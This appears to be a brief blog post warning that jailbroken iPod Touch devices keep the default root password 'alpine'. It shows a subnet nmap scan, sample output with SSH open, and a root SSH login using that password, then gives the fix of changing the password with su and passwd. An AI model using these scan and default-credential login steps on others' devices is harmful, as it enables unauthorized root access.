iPod Touch Vulnerability after Jailbreak
As you may know or may not know, there is a vulnerability for iPod Touch after jailbreak. The root password is hard-coded as “alpine”. If your iPod Touch connect to the hotspot network, people who is in the same subnet can do the following:
- Nmap the whole subnet.
- The scan result will be shown as follows.
- Then, the most likely what the people want to do is:
- Then, as you can guess, they want to do whatever they want.
sudo nmap -A -O -T4 112.55.82.0/24
Interesting ports on ******* (112.55.82.202):
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 5.2 (protocol 2.0)
62078/tcp open tcpwrapped
….
Running (JUST GUESSING) : Apple embedded (93%), Apple iPhone OS 1.X (89%)
ssh root@112.55.82.202
Password: alpine
John-Smiths-iPod:/ root# ls
Applications@ Library/ User@ boot/ dev/ lib/ private/ tmp@ var@
Developer/ System/ bin/ cores/ etc@ mnt/ sbin/ usr/
The solution is very simple: just to change root password after jailbreak. We can go to terminal application in the iPod.
- Type su – to enter super user mode
- Type passwd to enter the new password
- Type again the new password
- Type exit. We are done.
Good luck and Thanks,
Discussion Area - Leave a Comment